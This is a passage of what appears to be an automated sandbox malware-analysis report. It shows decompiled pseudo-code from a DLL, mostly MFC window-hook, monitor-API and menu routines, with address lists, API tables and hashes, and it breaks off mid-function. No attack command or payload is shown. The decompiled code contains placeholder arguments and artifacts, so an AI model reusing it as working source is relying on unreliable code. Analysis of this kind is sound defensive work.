								_t108 = 0x30;
								E10011C50( &_v320, 0, _t108);
								_v320.cbSize = _t108;
								_t71 = GetClassInfoExA(0, "#32768",  &_v320);
								 *0x1004ef68 = _t71;
								if(_t71 == 0) {
									if(GetClassNameA(_a8,  &_v272, 0x100) == 0) {
										goto L20;
									}
									_v17 = 0;
									if(E10011CB0(_t90, _t99,  &_v272, "#32768") == 0) {
										goto L24;
									}
									goto L20;
								}
								goto L16;
							}
							E1002212F(_t104, _a8);
							 *((intOrPtr*)( *_t104 + 0x50))();
							_t102 =  *((intOrPtr*)( *_t104 + 0xf0))();
							_t81 = SetWindowLongA(_a8, 0xfffffffc, E1002292C);
							if(_t81 != E1002292C) {
								 *_t102 = _t81;
							}
							 *(_t90 + 0x14) =  *(_t90 + 0x14) & 0x00000000;
							goto L24;
						}
						if((GetClassLongA(_a8, 0xffffffe6) & 0x00010000) != 0) {
							goto L24;
						}
						_t83 =  *(_t99 + 0x28);
						if(_t83 <= 0xffff) {
							_v16 = 0;
							GlobalGetAtomNameA(0,  &_v16, 5);
							_t83 =  &_v16;
						}
						if(lstrcmpiA(_t83, "ime") == 0) {
							goto L24;
						}
						goto L10;
					} else {
						L24:
						_t105 = CallNextHookEx( *(_t90 + 0x28), 3, _a8, _a12);
						if(_a4 != 0) {
							UnhookWindowsHookEx( *(_t90 + 0x28));
							 *(_t90 + 0x28) =  *(_t90 + 0x28) & 0x00000000;
						}
						_t60 = _t105;
						goto L27;
					}
				} else {
					_t60 = CallNextHookEx( *(_t90 + 0x28), _a4, _a8, _a12);
					L27:
					return E100117AE(_t60, _v8);
				}
			}























                                                                                                            0x100235d8
                                                                                                            0x100235de
                                                                                                            0x100235e8
                                                                                                            0x100235f4
                                                                                                            0x100235f6
                                                                                                            0x10023613
                                                                                                            0x10023616
                                                                                                            0x10023617
                                                                                                            0x10023620
                                                                                                            0x10023624
                                                                                                            0x10023627
                                                                                                            0x10023642
                                                                                                            0x10023692
                                                                                                            0x10023694
                                                                                                            0x100236db
                                                                                                            0x10023718
                                                                                                            0x1002372a
                                                                                                            0x10023761
                                                                                                            0x10023766
                                                                                                            0x1002376e
                                                                                                            0x10023771
                                                                                                            0x10023779
                                                                                                            0x10023786
                                                                                                            0x1002378f
                                                                                                            0x1002379e
                                                                                                            0x100237a1
                                                                                                            0x100237b1
                                                                                                            0x100237b1
                                                                                                            0x1002379e
                                                                                                            0x10023786
                                                                                                            0x00000000
                                                                                                            0x10023771
                                                                                                            0x00000000
                                                                                                            0x1002372c
                                                                                                            0x100236df
                                                                                                            0x100236ea
                                                                                                            0x100236f8
                                                                                                            0x10023707
                                                                                                            0x10023710
                                                                                                            0x10023716
                                                                                                            0x10023748
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023752
                                                                                                            0x1002375f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002375f
                                                                                                            0x00000000
                                                                                                            0x10023716
                                                                                                            0x1002369b
                                                                                                            0x100236a4
                                                                                                            0x100236bc
                                                                                                            0x100236be
                                                                                                            0x100236c6
                                                                                                            0x100236c8
                                                                                                            0x100236c8
                                                                                                            0x100236ca
                                                                                                            0x00000000
                                                                                                            0x100236ca
                                                                                                            0x10023654
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002365a
                                                                                                            0x10023662
                                                                                                            0x10023670
                                                                                                            0x10023675
                                                                                                            0x1002367b
                                                                                                            0x1002367b
                                                                                                            0x1002368c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100237b7
                                                                                                            0x100237b7
                                                                                                            0x100237cc
                                                                                                            0x100237ce
                                                                                                            0x100237d3
                                                                                                            0x100237d9
                                                                                                            0x100237d9
                                                                                                            0x100237de
                                                                                                            0x00000000
                                                                                                            0x100237e0
                                                                                                            0x100235f8
                                                                                                            0x10023604
                                                                                                            0x100237e1
                                                                                                            0x100237eb
                                                                                                            0x100237eb

                                                                                                            APIs
                                                                                                              • Part of subcall function 10037855: __EH_prolog.LIBCMT ref: 1003785A
                                                                                                            • CallNextHookEx.USER32 ref: 10023604
                                                                                                            • GetClassLongA.USER32 ref: 10023649
                                                                                                            • GlobalGetAtomNameA.KERNEL32(?,?,00000005), ref: 10023675
                                                                                                            • lstrcmpiA.KERNEL32(?,ime,?,?,100347FD), ref: 10023684
                                                                                                            • SetWindowLongA.USER32 ref: 100236BE
                                                                                                            • CallNextHookEx.USER32 ref: 100237C2
                                                                                                            • UnhookWindowsHookEx.USER32(?), ref: 100237D3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Hook$CallLongNext$AtomClassGlobalH_prologNameUnhookWindowWindowslstrcmpi
                                                                                                            • String ID: #32768$AfxOldWndProc423$ime
                                                                                                            • API String ID: 3204395069-4034971020
                                                                                                            • Opcode ID: 60e81f5e3488c30badae242d963b3e25ed67a4f765a4769238edff23d7bb639b
                                                                                                            • Instruction ID: 9db2fd6ca1a0fe5cf1724ce820e3dc2bd2b139ec8c0118dd51308d1b35c9be8a
                                                                                                            • Opcode Fuzzy Hash: 60e81f5e3488c30badae242d963b3e25ed67a4f765a4769238edff23d7bb639b
                                                                                                            • Instruction Fuzzy Hash: 1051AB75504269BFDF12DF61EC88FAA7BB9EF053A0F618164F814EA1A1C730DA44CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000799F Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 78libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 97%
                                                                                                            			E1000799F() {
				void* __edi;
				intOrPtr _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				void* _t17;
				struct HINSTANCE__* _t18;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x1004ee14; // 0x0
				if(_t23 == 0) {
					_push(_t17);
					 *0x1004ee18 = E10007952(_t17);
					_t18 = GetModuleHandleA("USER32");
					if(_t18 == 0) {
						L11:
						 *0x1004edf8 = 0;
						 *0x1004edfc = 0;
						 *0x1004ee00 = 0;
						 *0x1004ee04 = 0;
						 *0x1004ee08 = 0;
						 *0x1004ee0c = 0;
						 *0x1004ee10 = 0;
						 *0x1004ee14 = 1;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						 *0x1004edf8 = _t6;
						if(_t6 == 0) {
							goto L11;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							 *0x1004edfc = _t7;
							if(_t7 == 0) {
								goto L11;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								 *0x1004ee00 = _t8;
								if(_t8 == 0) {
									goto L11;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									 *0x1004ee04 = _t9;
									if(_t9 == 0) {
										goto L11;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										 *0x1004ee0c = _t10;
										if(_t10 == 0) {
											goto L11;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											 *0x1004ee08 = _t11;
											if(_t11 == 0) {
												goto L11;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												 *0x1004ee10 = _t12;
												if(_t12 == 0) {
													goto L11;
												} else {
													_t5 = 1;
													 *0x1004ee14 = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					return _t5;
				} else {
					_t24 =  *0x1004ee08; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}
















                                                                                                            0x100079a2
                                                                                                            0x100079a8
                                                                                                            0x100079b8
                                                                                                            0x100079c3
                                                                                                            0x100079ce
                                                                                                            0x100079d2
                                                                                                            0x10007a5f
                                                                                                            0x10007a5f
                                                                                                            0x10007a65
                                                                                                            0x10007a6b
                                                                                                            0x10007a71
                                                                                                            0x10007a77
                                                                                                            0x10007a7d
                                                                                                            0x10007a83
                                                                                                            0x10007a89
                                                                                                            0x10007a93
                                                                                                            0x100079d8
                                                                                                            0x100079e4
                                                                                                            0x100079e8
                                                                                                            0x100079ed
                                                                                                            0x00000000
                                                                                                            0x100079ef
                                                                                                            0x100079f5
                                                                                                            0x100079f9
                                                                                                            0x100079fe
                                                                                                            0x00000000
                                                                                                            0x10007a00
                                                                                                            0x10007a06
                                                                                                            0x10007a0a
                                                                                                            0x10007a0f
                                                                                                            0x00000000
                                                                                                            0x10007a11
                                                                                                            0x10007a17
                                                                                                            0x10007a1b
                                                                                                            0x10007a20
                                                                                                            0x00000000
                                                                                                            0x10007a22
                                                                                                            0x10007a28
                                                                                                            0x10007a2c
                                                                                                            0x10007a31
                                                                                                            0x00000000
                                                                                                            0x10007a33
                                                                                                            0x10007a39
                                                                                                            0x10007a3d
                                                                                                            0x10007a42
                                                                                                            0x00000000
                                                                                                            0x10007a44
                                                                                                            0x10007a4a
                                                                                                            0x10007a4e
                                                                                                            0x10007a53
                                                                                                            0x00000000
                                                                                                            0x10007a55
                                                                                                            0x10007a57
                                                                                                            0x10007a58
                                                                                                            0x10007a58
                                                                                                            0x10007a53
                                                                                                            0x10007a42
                                                                                                            0x10007a31
                                                                                                            0x10007a20
                                                                                                            0x10007a0f
                                                                                                            0x100079fe
                                                                                                            0x100079ed
                                                                                                            0x10007a98
                                                                                                            0x100079aa
                                                                                                            0x100079ac
                                                                                                            0x100079b6
                                                                                                            0x100079b6

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(USER32,?,?,?,10007AF0), ref: 100079C8
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 100079E4
                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 100079F5
                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 10007A06
                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 10007A17
                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 10007A28
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 10007A39
                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 10007A4A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                            • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                            • API String ID: 667068680-68207542
                                                                                                            • Opcode ID: c432c94375e8382fa0d09503a03fb3d1310a5af8d0fbbc4bfd570d7384b4b05a
                                                                                                            • Instruction ID: ffa68e8141f0c788966a5bf5f1ab221f1da63df34d474a4f7eb5d2f911dd9ebc
                                                                                                            • Opcode Fuzzy Hash: c432c94375e8382fa0d09503a03fb3d1310a5af8d0fbbc4bfd570d7384b4b05a
                                                                                                            • Instruction Fuzzy Hash: 05214F71E055B19EF702EF678EC482EBAE5F38B381351483FD109D6125C7B44D518B9A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10024FBB Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 273stringwindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 84%
                                                                                                            			E10024FBB(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v32;
				char _v268;
				char _v292;
				char _v296;
				signed int _v300;
				CHAR* _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				void* __ebp;
				signed int _t102;
				intOrPtr _t106;
				signed int _t108;
				signed int _t110;
				int* _t118;
				signed int _t125;
				signed int _t128;
				signed int _t132;
				void* _t136;
				intOrPtr* _t138;
				void* _t170;
				intOrPtr* _t171;
				void* _t173;
				int _t175;
				intOrPtr _t176;
				signed int _t177;
				intOrPtr _t180;
				intOrPtr* _t181;
				signed int _t182;
				intOrPtr _t183;
				signed char _t196;
				signed char _t197;
				signed int _t217;
				intOrPtr* _t219;
				intOrPtr* _t220;
				void* _t223;
				intOrPtr* _t224;
				signed int _t226;
				void* _t228;
				void* _t229;
				void* _t230;

				_t223 = __esi;
				_t181 = __ecx;
				_t170 = __ebx;
				_t102 =  *0x1004c470; // 0x6edecb8c
				_push(__esi);
				_push(__edi);
				_v8 = _t102;
				_t219 = __ecx;
				if(_a4 == 0 || lstrlenA(_a4) >= 0x104) {
					L10:
					_push(0);
					_push(0xffffffff);
					_push(3);
					E10027180(_t181);
					asm("int3");
					E10011BF0(0x1003ab29, _t228);
					_t230 = _t229 - 0x12c;
					_t106 =  *0x1004c470; // 0x6edecb8c
					_push(_t170);
					_push(_t223);
					_t224 = _a4;
					_push(_t219);
					_t220 = _t181;
					_t182 =  *(_t224 + 0xc);
					_v20 = _t106;
					_t171 = _t220 + 0x1c;
					_t108 =  *( *_t171 - 0xc);
					__eflags = _t108;
					if(_t108 == 0) {
						__eflags = _t182;
						if(_t182 != 0) {
							E10026397(_t182,  *(_t224 + 4), _t171, _t108);
						}
					}
					_t183 =  *((intOrPtr*)( *((intOrPtr*)(_t220 + 8))));
					_t110 = 0;
					__eflags =  *(_t183 - 0xc);
					if( *(_t183 - 0xc) != 0) {
						__eflags =  *(_t224 + 0xc);
						if( *(_t224 + 0xc) != 0) {
							_t173 = 0;
							__eflags =  *(_t220 + 4);
							if( *(_t220 + 4) > 0) {
								do {
									DeleteMenu( *( *(_t224 + 0xc) + 4),  *(_t224 + 4) + _t173, 0);
									_t173 = _t173 + 1;
									__eflags = _t173 -  *(_t220 + 4);
								} while (_t173 <  *(_t220 + 4));
							}
							_t110 = GetCurrentDirectoryA(0x104,  &_v292);
							__eflags = _t110;
							if(_t110 != 0) {
								__eflags = _t110 - 0x104;
								if(_t110 < 0x104) {
									_t175 = lstrlenA( &_v292);
									 *((char*)(_t228 + _t175 - 0x120)) = 0x5c;
									_t176 = _t175 + 1;
									_v308 = _t176;
									 *((char*)(_t228 + _t176 - 0x120)) = 0;
									_v300 =  *((intOrPtr*)( *((intOrPtr*)(E100243B2())) + 0xc))() + 0x10;
									_v8 = _v8 & 0x00000000;
									_t118 = E100243B2();
									_t216 =  *_t118;
									_v296 =  *((intOrPtr*)( *_t118 + 0xc))() + 0x10;
									_a4 = _a4 & 0x00000000;
									__eflags =  *(_t220 + 4);
									_v8 = 1;
									if( *(_t220 + 4) > 0) {
										while(1) {
											_t125 =  *((intOrPtr*)( *_t220 + 8))( &_v300, _a4,  &_v292, _t176, 1);
											__eflags = _t125;
											if(_t125 == 0) {
												goto L40;
											}
											_t177 = _v300;
											_t128 = E100017D0( &_v296,  *((intOrPtr*)(_t177 - 0xc)) +  *((intOrPtr*)(_t177 - 0xc)));
											while(1) {
												_t196 =  *_t177;
												__eflags = _t196;
												if(_t196 == 0) {
													break;
												}
												__eflags = _t196 - 0x26;
												if(_t196 == 0x26) {
													 *_t128 = _t196;
													_t128 = _t128 + 1;
													__eflags = _t128;
												}
												_t197 =  *_t177;
												_t217 = _t197 & 0x000000ff;
												__eflags =  *(_t217 + 0x10050a81) & 0x00000004;
												if(( *(_t217 + 0x10050a81) & 0x00000004) != 0) {
													 *_t128 = _t197;
													_t128 = _t128 + 1;
													_t177 = _t177 + 1;
													__eflags = _t177;
												}
												 *_t128 =  *_t177;
												_t128 = _t128 + 1;
												_t177 = _t177 + 1;
												__eflags = _t177;
											}
											 *_t128 = _t196;
											E10006CE2(_t177,  &_v296, _t220, 0xffffffff);
											_t132 =  *((intOrPtr*)(_t220 + 0x14)) + _a4 + 0x00000001 & 0x0000000f;
											__eflags = _t132 - 0xa;
											if(__eflags <= 0) {
												if(__eflags != 0) {
													wsprintfA( &_v32, ??, "&%d ", _t132);
													goto L38;
												} else {
													lstrcpyA( &_v32, "1&0 ");
												}
											} else {
												wsprintfA( &_v32, ??, "%d ", _t132);
												L38:
												_t230 = _t230 + 0xc;
											}
											_push( &_v32);
											_t136 = E10006B11( &_v312, __eflags);
											_push( &_v296);
											_push(_t136);
											_push( &_v316);
											_v8 = 2;
											_t138 = E10024DC7( &_v296, __eflags);
											_t216 =  *(_t224 + 8);
											_t203 =  *(_t224 + 4);
											_t77 = _t216 + 1; // 0x1
											 *(_t224 + 8) = _t77;
											_t79 = _t203 + 1; // 0x3
											_t230 = _t230 + 0xc;
											 *(_t224 + 4) = _t79;
											_v304 =  *_t138;
											InsertMenuA( *( *(_t224 + 0xc) + 4),  *(_t224 + 8), 0x400,  *(_t224 + 4), _v304);
											E100014B0(_v316 + 0xfffffff0,  *(_t224 + 8));
											_v8 = 1;
											E100014B0(_v312 + 0xfffffff0,  *(_t224 + 8));
											_a4 = _a4 + 1;
											__eflags = _a4 -  *(_t220 + 4);
											if(_a4 <  *(_t220 + 4)) {
												_t176 = _v308;
												continue;
											}
											goto L40;
										}
									}
									L40:
									 *(_t224 + 8) =  *(_t224 + 8) - 1;
									 *((intOrPtr*)(_t224 + 0x20)) = GetMenuItemCount( *( *(_t224 + 0xc) + 4));
									 *((intOrPtr*)(_t224 + 0x18)) = 1;
									E100014B0(_v296 + 0xfffffff0, _t216);
									__eflags = _v300 + 0xfffffff0;
									_t110 = E100014B0(_v300 + 0xfffffff0, _t216);
								}
							}
						}
					} else {
						_t180 =  *_t171;
						__eflags =  *(_t180 - 0xc);
						if( *(_t180 - 0xc) != 0) {
							 *((intOrPtr*)( *_t224 + 0xc))(_t180);
						}
						_t110 =  *((intOrPtr*)( *_t224))(0);
					}
					 *[fs:0x0] = _v16;
					return E100117AE(_t110, _v20);
				} else {
					_push(_a4);
					_push( &_v268);
					if(E1002592C(__ebx, _t219, __esi) == 0) {
						goto L10;
					} else {
						_t226 = 0;
						if( *((intOrPtr*)(_t219 + 4)) - 1 > 0) {
							while(E1002535C(_t170, _t219, _t226,  *((intOrPtr*)( *((intOrPtr*)(_t219 + 8)) + _t226 * 4)),  &_v268) == 0) {
								_t226 = _t226 + 1;
								if(_t226 <  *((intOrPtr*)(_t219 + 4)) - 1) {
									continue;
								} else {
								}
								L8:
								while(_t226 > 0) {
									E100074A5(_t170,  *((intOrPtr*)(_t219 + 8)) + _t226 * 4, _t228,  *((intOrPtr*)(_t219 + 8)) + _t226 * 4 - 4);
									_t226 = _t226 - 1;
									__eflags = _t226;
								}
								goto L9;
							}
							goto L8;
						}
						L9:
						return E100117AE(E10006AEC( *((intOrPtr*)(_t219 + 8)),  &_v268), _v8);
					}
				}
			}















































                                                                                                            0x10024fbb
                                                                                                            0x10024fbb
                                                                                                            0x10024fbb
                                                                                                            0x10024fc8
                                                                                                            0x10024fcd
                                                                                                            0x10024fce
                                                                                                            0x10024fcf
                                                                                                            0x10024fd2
                                                                                                            0x10024fd4
                                                                                                            0x1002505a
                                                                                                            0x1002505a
                                                                                                            0x1002505c
                                                                                                            0x1002505e
                                                                                                            0x10025060
                                                                                                            0x10025065
                                                                                                            0x1002506b
                                                                                                            0x10025070
                                                                                                            0x10025076
                                                                                                            0x1002507b
                                                                                                            0x1002507c
                                                                                                            0x1002507d
                                                                                                            0x10025080
                                                                                                            0x10025081
                                                                                                            0x10025083
                                                                                                            0x10025086
                                                                                                            0x10025089
                                                                                                            0x1002508e
                                                                                                            0x10025091
                                                                                                            0x10025093
                                                                                                            0x10025095
                                                                                                            0x10025097
                                                                                                            0x1002509e
                                                                                                            0x1002509e
                                                                                                            0x10025097
                                                                                                            0x100250a6
                                                                                                            0x100250a8
                                                                                                            0x100250aa
                                                                                                            0x100250ad
                                                                                                            0x100250cb
                                                                                                            0x100250ce
                                                                                                            0x100250d4
                                                                                                            0x100250d6
                                                                                                            0x100250d9
                                                                                                            0x100250db
                                                                                                            0x100250e9
                                                                                                            0x100250ef
                                                                                                            0x100250f0
                                                                                                            0x100250f0
                                                                                                            0x100250db
                                                                                                            0x10025102
                                                                                                            0x10025108
                                                                                                            0x1002510a
                                                                                                            0x10025110
                                                                                                            0x10025112
                                                                                                            0x10025125
                                                                                                            0x10025127
                                                                                                            0x1002512f
                                                                                                            0x10025130
                                                                                                            0x10025136
                                                                                                            0x1002514d
                                                                                                            0x10025153
                                                                                                            0x10025157
                                                                                                            0x1002515c
                                                                                                            0x10025166
                                                                                                            0x1002516c
                                                                                                            0x10025170
                                                                                                            0x10025174
                                                                                                            0x10025178
                                                                                                            0x10025186
                                                                                                            0x1002519e
                                                                                                            0x100251a1
                                                                                                            0x100251a3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100251a9
                                                                                                            0x100251bb
                                                                                                            0x100251e2
                                                                                                            0x100251e2
                                                                                                            0x100251e4
                                                                                                            0x100251e6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100251c2
                                                                                                            0x100251c5
                                                                                                            0x100251c7
                                                                                                            0x100251c9
                                                                                                            0x100251c9
                                                                                                            0x100251c9
                                                                                                            0x100251ca
                                                                                                            0x100251cc
                                                                                                            0x100251cf
                                                                                                            0x100251d6
                                                                                                            0x100251d8
                                                                                                            0x100251da
                                                                                                            0x100251db
                                                                                                            0x100251db
                                                                                                            0x100251db
                                                                                                            0x100251de
                                                                                                            0x100251e0
                                                                                                            0x100251e1
                                                                                                            0x100251e1
                                                                                                            0x100251e1
                                                                                                            0x100251e8
                                                                                                            0x100251f2
                                                                                                            0x10025201
                                                                                                            0x10025204
                                                                                                            0x10025207
                                                                                                            0x10025211
                                                                                                            0x1002522e
                                                                                                            0x00000000
                                                                                                            0x10025213
                                                                                                            0x1002521c
                                                                                                            0x1002521c
                                                                                                            0x10025209
                                                                                                            0x1002522e
                                                                                                            0x1002522a
                                                                                                            0x10025234
                                                                                                            0x10025234
                                                                                                            0x1002523a
                                                                                                            0x10025241
                                                                                                            0x1002524c
                                                                                                            0x1002524d
                                                                                                            0x10025254
                                                                                                            0x10025255
                                                                                                            0x10025259
                                                                                                            0x1002525e
                                                                                                            0x10025261
                                                                                                            0x10025264
                                                                                                            0x10025267
                                                                                                            0x1002526a
                                                                                                            0x1002526d
                                                                                                            0x10025270
                                                                                                            0x10025275
                                                                                                            0x1002528e
                                                                                                            0x1002529d
                                                                                                            0x100252ab
                                                                                                            0x100252af
                                                                                                            0x100252b4
                                                                                                            0x100252ba
                                                                                                            0x100252bd
                                                                                                            0x10025180
                                                                                                            0x00000000
                                                                                                            0x10025180
                                                                                                            0x00000000
                                                                                                            0x100252bd
                                                                                                            0x10025186
                                                                                                            0x100252c3
                                                                                                            0x100252c6
                                                                                                            0x100252db
                                                                                                            0x100252de
                                                                                                            0x100252e5
                                                                                                            0x100252f0
                                                                                                            0x100252f3
                                                                                                            0x100252f3
                                                                                                            0x10025112
                                                                                                            0x1002510a
                                                                                                            0x100250af
                                                                                                            0x100250af
                                                                                                            0x100250b1
                                                                                                            0x100250b4
                                                                                                            0x100250bb
                                                                                                            0x100250bb
                                                                                                            0x100250c4
                                                                                                            0x100250c4
                                                                                                            0x100252fd
                                                                                                            0x1002530e
                                                                                                            0x10024fea
                                                                                                            0x10024fea
                                                                                                            0x10024ff3
                                                                                                            0x10024ffb
                                                                                                            0x00000000
                                                                                                            0x10024ffd
                                                                                                            0x10025000
                                                                                                            0x10025005
                                                                                                            0x10025007
                                                                                                            0x10025021
                                                                                                            0x10025025
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10025027
                                                                                                            0x00000000
                                                                                                            0x10025039
                                                                                                            0x10025033
                                                                                                            0x10025038
                                                                                                            0x10025038
                                                                                                            0x10025038
                                                                                                            0x00000000
                                                                                                            0x10025039
                                                                                                            0x00000000
                                                                                                            0x10025007
                                                                                                            0x1002503d
                                                                                                            0x10025057
                                                                                                            0x10025057
                                                                                                            0x10024ffb

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 10024FDD
                                                                                                            • __EH_prolog.LIBCMT ref: 1002506B
                                                                                                            • DeleteMenu.USER32(?,?,00000000), ref: 100250E9
                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 10025102
                                                                                                            • lstrlenA.KERNEL32(?), ref: 1002511F
                                                                                                            • wsprintfA.USER32 ref: 1002522E
                                                                                                              • Part of subcall function 1002592C: __EH_prolog.LIBCMT ref: 10025931
                                                                                                              • Part of subcall function 1002592C: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 1002595B
                                                                                                              • Part of subcall function 1002592C: lstrcpynA.KERNEL32(?,?,00000104), ref: 1002596C
                                                                                                            • lstrcpyA.KERNEL32(?,1&0 ,000000FF,?), ref: 1002521C
                                                                                                            • InsertMenuA.USER32(00000002,00000000,00000400,00000002,?), ref: 1002528E
                                                                                                            • GetMenuItemCount.USER32 ref: 100252CC
                                                                                                              • Part of subcall function 1002535C: lstrcmpiA.KERNEL32(?,00000000), ref: 10025375
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$H_prologlstrlen$CountCurrentDeleteDirectoryFullInsertItemNamePathlstrcmpilstrcpylstrcpynwsprintf
                                                                                                            • String ID: %d $&%d $1&0 $\
                                                                                                            • API String ID: 342826643-2399880791
                                                                                                            • Opcode ID: e1eed6eaa5f1d35012eb48c82aef279fa05277b41a2bb3cefb7989940d9464f9
                                                                                                            • Instruction ID: 8aad9e791dd0b61d4e6d294f68b120ef5cdd25e9988c916dda0b03ab33557493
                                                                                                            • Opcode Fuzzy Hash: e1eed6eaa5f1d35012eb48c82aef279fa05277b41a2bb3cefb7989940d9464f9
                                                                                                            • Instruction Fuzzy Hash: 31B1BD34900215DFDB10CF64DC84FAAB7B4FF09345F508699E59A8B292DB31EA84CF94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001D28C Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 123registryclipboardCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 92%
                                                                                                            			E1001D28C(struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
				void* __ebp;
				signed int _t31;
				signed int _t33;
				void* _t40;
				int _t46;
				intOrPtr _t64;
				signed int* _t65;
				void* _t67;
				intOrPtr* _t69;

				if(_a4 != 0) {
					_push(0x100347fd);
					_t53 = 0x1004efe8;
					_t67 = E10037855(0x1004efe8);
					__eflags =  *(_t67 + 0x18);
					if( *(_t67 + 0x18) != 0) {
						_push(_a4);
						__eflags = E10022115();
						if(__eflags == 0) {
							_t53 =  *(_t67 + 0x18);
							E10022DAA( *(_t67 + 0x18), __eflags, _a4);
							 *(_t67 + 0x18) = 0;
						}
					}
					_t64 = _a8;
					__eflags = _t64 - 0x110;
					if(_t64 != 0x110) {
						__eflags = _t64 -  *0x1004f3b8; // 0x0
						if(__eflags == 0) {
							L22:
							SendMessageA(_a4, 0x111, 0xe146, 0);
							_t31 = 1;
							__eflags = 1;
							goto L23;
						}
						__eflags = _t64 - 0x111;
						if(_t64 != 0x111) {
							L10:
